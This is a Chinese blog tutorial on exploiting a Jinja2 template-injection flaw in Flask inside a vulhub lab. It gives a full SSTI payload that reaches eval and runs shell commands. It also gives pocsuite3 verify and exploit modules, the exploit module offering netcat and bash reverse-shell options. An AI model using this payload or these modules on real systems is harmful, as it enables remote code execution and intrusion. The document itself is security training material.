python安全攻防_python安全攻防第三章之Poc

最新推荐文章于 2024-07-09 15:00:17 发布
最新推荐文章于 2024-07-09 15:00:17 发布
阅读量443 收藏
点赞数
文章标签: python安全攻防
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39800957/article/details/111431072
版权
本文详细介绍了 Flask 框架的一个代码执行漏洞,包括漏洞的成因、利用方式以及如何编写 POC 进行检测。文章通过分析 Flask 的微框架特性,展示了利用 Jinja2 模板引擎进行代码注入的示例,并给出了两个不同的 POC 示例,用于验证目标系统的漏洞存在性。
摘要由CSDN通过智能技术生成

pocsuite安装

安装pocsuite3

pip3 install pocsuite

安装数据包

pip3 install -r requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple/

requirement.txt内容

requests == 2.22.0

PySocks == 1.7.1

requests-toolbelt == 0.9.1

urllib3 == 1.25.6

flask简介

Flask是一个使用pyton编写的轻量级Web应用框架,模板引擎则使用Jinja2。Flask属于微框架(micro-framework),这既是优点也是缺点,优点是框架轻量,更新依赖少,更容易专注于安全方面的漏洞,缺点是不得不通过添加插件来增加依赖列表。Flask 依赖中就有造成模板注人漏洞的插件Jinja2的模板引擎,Jinja2 是一个面向Python的模板语言。

环境安装

git clone https://github.com/vulhub/vulhub.git

进入、vulhub/flask/ssit

docker-compose build

docker-compose up -d

2.代码分析

docker ps -a

docker exec -it 1e8500123856 /bin/bash

def index():

name = request.args.get('name', 'guest')

t = Template("Hello " + name)

return t.render()

if __name__ == "__main__":

app.run()

可以看出name未经过滤就传入了服务器

利用代码及方式

payload:

{% for c in [].__class__.__base__.__subclasses__() %}

{% if c.__name__ == 'catch_warnings' %}

{% for b in c.__init__.__globals__.values() %}

{% if b.__class__ == {}.__class__ %}

{% if 'eval' in b.keys() %}

{{ b['eval']('__import__("os").popen("id

").read()') }}

{% endif %}

{% endif %}

{% endfor %}

{% endif %}

{% endfor %}

顺利执行,可以查看文件内容

关于poc的编写

poc验证模块

from collections import OrderedDict

from urllib.parse import urljoin

import re

from pocsuite3.api import POCBase, Output, register_poc, logger, requests, OptDict, VUL_TYPE

from pocsuite3.api import REVERSE_PAYLOAD, POC_CATEGORY

class DemoPOC(POCBase):

vulID = '1.1'

version = '1.1'

author = ['1']

vulDate = '1.1'

createDate = '2020/10/10'

updateDate = '1.1'

references = ['flask']

name = 'flask-poc'

appPowerLink = 'flask'

appName = 'flask'

appVersion = 'flask'

vulType = VUL_TYPE.CODE_EXECUTION

desc = '''

flask

'''

#samples = ['96.234.71.117:80']

#category = POC_CATEGORY.EXPLOITS.REMOTE

def _verify(self):

result = {}

path = "?name="

url = self.url + path

payload = "{{3*3}}"

try:

res = requests.get(url=url + payload )

if res.status_code == 200 and "9" in res.text:

result['VerifyInfo'] = {}

result['VerifyInfo'] = url

result['VerifyInfo'] = payload

except Exception as e: #

return

return self.parse_output(result)

def _attack(self):

return self._verify()

def parse_output(self, result):

output = Output(self)

if result:

output.success(result)

else:

output.fail('target is not culnerable')

return output

register_poc(DemoPOC)

执行结果:

exp执行模块

from collections import OrderedDict

from urllib.parse import urljoin

import re

from pocsuite3.api import POCBase, Output, register_poc, logger, requests, OptDict, VUL_TYPE

from pocsuite3.api import REVERSE_PAYLOAD, POC_CATEGORY

class DemoPOC(POCBase):

vulID = '1.1'

version = '1.1'

author = ['1']

vulDate = '1.1'

createDate = '1.1'

updateDate = '1.1'

references = ['1.1']

name = 'flack-exp'

appPowerLink = 'flack'

appName = 'flask'

appVersion = 'flask'

vulType = VUL_TYPE.CODE_EXECUTION

desc = '''

'''

#samples = ['96.234.71.117:80']

#category = POC_CATEGORY.EXPLOITS.REMOTE

def _options(self): # 结束command参数并执行

o = OrderedDict()

payload = {

"nc": REVERSE_PAYLOAD.NC,

"bash": REVERSE_PAYLOAD.BASH,

}

o["command"] = OptDict(selected="bash", default=payload)

return o

def _verify(self):

output = Output(self)

result = {}

def _attack(self):

#url:http://192.168.0.103:8000/?name={{2*2}}

result = {}

path = "?name="

url = self.url + path

cmd = self.get_option("command")

# payload含义:绕过注册的python逃逸的内置函数

payload = 'name=%7B%25%20for%20c%20in%20%5B%5D.__class__.__base__.__subclasses__()%20%25%7D%0A%7B%25%20if%20c.__name__%20%3D%3D%20%27catch_warnings%27%20%25%7D%0A%20%20%7B%25%20for%20b%20in%20c.__init__.__globals__.values()%20%25%7D%0A%20%20%7B%25%20if%20b.__class__%20%3D%3D%20%7B%7D.__class__%20%25%7D%0A%20%20%20%20%7B%25%20if%20%27eval%27%20in%20b.keys()%20%25%7D%0A%20%20%20%20%20%20%7B%7B%20b%5B%27eval%27%5D(%27__import__("os").popen("' + cmd + '").read()%27)%20%7D%7D%0A%20%20%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endfor%20%25%7D%0A%7B%25%20endif%20%25%7D%0A%7B%25%20endfor%20%25%7D'

try:

res = requests.get(url=url + payload)

t = res.text

t = t.replace('\n','').replace('\r','')

print(t)

t = t.replace(" ","")

result['VerifyInfo'] = {}

result['VerifyInfo']['URL'] = url

result['VerifyInfo']['Name'] = payload

except Exception as e:

return

return self.parse_attack(result)

def parse_attack(self,result):

output = Output(self)

if result:

output.success(result)

else:

output.fail('target is not vulnerable')

return output

register_poc(DemoPOC)

执行结果:

还可以利用shell交互模式

`

原文链接:https://blog.csdn.net/qq_34640691/article/details/109005216

weixin_39800957
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Python安全攻防:渗透测试实战指南》学习一
weixin_42775865的博客
10-06 3413
第1章 渗透测试概述 1.信息安全发展史 2.信息安全行业的现状 2.1渗透测试 2.1.1黑盒测试 是指在对客户组织的产品一无所知的情况下模拟真实的入侵手段,对用户所需测试的产品进行渗透测试。 2.1.2白盒测试 是指在拥有客户组织所有的资产信息的情况下进行渗透测试。 2.2渗透测试的基本流程 渗透测试是处于保护系统的目的,对目标系统进行的一系...
【保姆级】黑客入门教程「Python安全攻防:渗透测试实战指南」经典纯狱风~
wangluo12138的博客
11-28 2047
在网络安全领域,是否具备编程能力是“脚本小子”和真正黑客的本质区别。
零基础入门网络安全必看的5本书籍(附PDF)
最新发布
2401_85773496的博客
07-09 505
书中自有黄金屋,书中自有颜如玉。很多人学习一门技术都会看大量的书籍,经常也有朋友询问:零基础刚入门,应该看哪些书?应该怎么学?等等问题。今天就整理了5本零基础入门网络安全必看书籍,希望能帮到每一位认真学习网络安全的朋友!(文末有领取方式)
Python安全攻防——网络化编程(一):网络架构
m0_73965301的博客
09-04 329
在网络中,每台主机系统都拥有一个唯一的IP地址,发送方根据接收方的IP地址,将消息发送到接收方。OSI协议是由ISO(国际标准化组织)制定的,用于提供给开发者一个必须的、通用的概念以便开发完善、可以用来解释连接不同系统的框架。通过IP地址(IPV4:64位,IPV6:128位)用来标识网络上的主机,在公开网络上或者局域网内部,每台主机都必须使用不同的IP地址。各层可以独立设计和实现,只要保证相邻层之间的调用规范和接口不变,便可以非常方便、灵活的改变各层的内部实现方式,以进行优化和完成需求。
python安全攻防】将python脚本部署到web渗透平台,浏览器前端运行后台python脚本
白帽子续命指南
11-12 879
项目地址 https://gitee.com/c0ny10/information-collection-demo/ 可以看到有两个文件(目前是只有两个,以后会一点点上传的),一个是py文件,一个是html文件,这两个文件分别对应着python脚本和前端代码,下面来分别说说这两个文件应该如何编写。 python脚本 python脚本有一个要求,除了主要逻辑代码的书写以外,必须以接收命令行参数的方式传递参数。 不会的朋友可以看看上一期的文章,有手就能学会,(开玩笑的,没手也行) https://mp.wei
python安全攻防网络代理
willow_liang的博客
10-21 191
requests模块代理 import requests proxy = '127.0.0.1:1080' proxies = { 'http':'http://' + proxy, 'https':'https://' + proxy } try: respone = requests.get('http://httpbin.rof/get',proxies=proxies) print(respone.text) except Exception as e:
Python for Informatics 第11章之正则表达式(二)
10-22
Python编程语言中,正则表达式是一种强大的文本处理工具,用于匹配、查找、替换等操作。本章节主要探讨了正则表达式的一些关键概念,特别是字符匹配、重复次数以及贪婪与非贪婪模式。 1. **字符匹配** 正则...
Python for Informatics 第11章之正则表达式(四)
12-24
注:以下文章原文来自于Dr Charles Severance 的 《Python for Informatics》 11.3 组合查询和抽取  如果我们想以“X-”字符串开头的行中找到数字,就像下面两行字符串: X-DSPAM-Confidence: 0.8475 X-DSPAM-...
第三章之Bootstrap 表格与按钮功能
12-28
Bootstrap,来自 Twitter,是目前最受欢迎的前端框架。... 学习要点: 1.表格 2.按钮 本节课我们主要学习一下 Bootstrap 表格和按钮功能,通过内置的 CSS 定义,显示各种丰富的效果。...一....Bootstrap 提供了一些丰富的...
Python安全攻防之第二章Python语言基础
shy的博客
04-10 530
不同于在渗透测试中使用的字典,Python中的字典是包含若干“键:值”元素的可变序列,字典中的每一个元素都包含用冒号分开的“键”和“值”,不同元素之间用逗号隔开,所有元素放在一对大括号“{”和“}”中。另外,需要注意的是字典中的“键”不能重复,而“值”可以重复。在实际应用中,一些远程管理软件和网络安全软件大多依赖于Socket来实现特定功能,由于TCP(Transmission Control Protocol,传输控制协议)方式在网络编程中应用得非常频繁,此处将对TCP编程进行讲解并给出具体应用实例。
Python安全攻防:渗透测试实战指南》学习二
weixin_42775865的博客
10-12 989
第2章 Python语言基础 1.Python 环境的搭建 Windows 系统下的安装 Linux 系统下的安装 2.编写第一个Python程序 3.Python模块的安装与使用 4.Python序列 列表 元组 字典 5.Python控制结构 选择结构 循环结构 6.文件处理 open(file[,mode='r'[,buffering=-1]])·...
基于Python的网络黑客攻击技术分析研究与防范策略.pdf
06-28
基于Python的网络黑客攻击技术分析研究与防范策略.pdf
16.Python攻防之弱口令、自定义字典生成及网站暴库防护1
08-03
声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。一.基础概念1.
各类POC集合大全
04-26
各类POC集合大全 没细看 1000多个吧 需要的可以下载下来看看
揭秘:中国第一代黑客攻防实录
Python_0011的博客
11-28 318
在网络技术蓬勃发展的今天,网络安全问题也受到了日益严峻的考验,甚至到了令人堪优的地步,一个令人觉得神秘而可怕的名词逐渐进入了我们的世界——黑客。对于绝大多数人来说,黑客是一个非常熟悉却非常陌生的东西,熟悉的是“黑客”这个名词,而陌生的是黑客的真实世界。然而要真正了解黑客的性质和对在网络时代中的影响,我们还得通过了解一些黑客的真实事件才行。
Python安全攻防:渗透测试实战指南》极致经典,学完即可包吃包住
bdfcfff77fa的博客
05-26 992
网络江湖,风起云涌,攻防博弈,从未间断,且愈演愈烈。从架构安全到被动纵深防御,再到主动防御、安全智能,直至进攻反制,皆直指安全的本质——攻防。未知攻,焉知防!每一位网络安全从业者都有仗剑江湖的侠客情怀和维护网络公平正义的初心。渗透测试就是一把“利剑”,出其不意、攻其不备,模拟黑客之攻击,为安全防御系统诊脉,补全不足,修炼内功,提升防御能力。用别人之剑,还是自己铸剑?哪个更得心应手?哪个威力更强大?答案显而易见。《Python安全攻防:渗透测试实战指南》
Python安全攻防-从入门到入狱
热门推荐
Yasso的博客
01-31 1万+
Python安全攻防-从入门到入狱
python:网络安全攻击与防御的工具(附零基础学习资料)
Java癫疯的博客
11-09 1768
python:网络安全攻击与防御的工具(附零基础学习资料)
Python全栈(五)Web安全攻防之11.Web安全攻防小结
CUFEECR的博客
03-25 3476
信息收集包括域名、端口、敏感信息、真实IP地址的收集,还包括工具shodan使用。sqlmap包含很多参数,主要有target、request、optimization、injection、Technique、enumeration等方面的参数。SQL注入前提条件、分类,包括GET报错的注入、基于时间的盲注、基于布尔的盲注,POST报错的注入,还有注入的绕过手段。XSS跨站脚本包括三类(反射型、存储型和DOM型),有常见的payload。文件上传有6种常见的绕过验证的方式。
《亚马逊逆向工作法》第三章之《组织:独立单线程领导模式》读后感
02-16
《亚马逊逆向工作法》第三章《组织:独立单线程领导模式》是讲述亚马逊公司在组织架构上的创新与变革。本章主要阐述了亚马逊公司领导模式的改变,从原先的分层管理模式转变为独立单线程领导模式。 独立单线程领导模式是指将一个完整的产品或服务的所有流程都交由一个单一的团队负责,该团队将负责整个流程的设计、开发、测试、部署等各个环节。这种领导模式可以提高工作效率、降低沟通成本和管理成本,同时也可以激发员工的工作热情和创造力。 阅读完本章后,我对亚马逊公司的这种组织方式感到十分惊叹。亚马逊公司在组织架构上的创新与变革,让我对亚马逊公司在竞争中的优势有了更加深刻的认识。同时,我也认为这种领导模式可以在其他公司中得到借鉴和应用。将一个完整的产品或服务的所有流程交由一个单一的团队负责,可以提高工作效率,降低沟通成本和管理成本,这种模式可以在很多公司中得到应用。但是这种模式也存在一些局限性,比如团队规模过大会导致管理难度加大,同时团队成员之间的协作和协调也需要更高的能力。 总的来说,《亚马逊逆向工作法》第三章的内容很值得一读,不仅可以了解到亚马逊公司的创新与变革,也可以为其他公司提供一些思路和借鉴。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值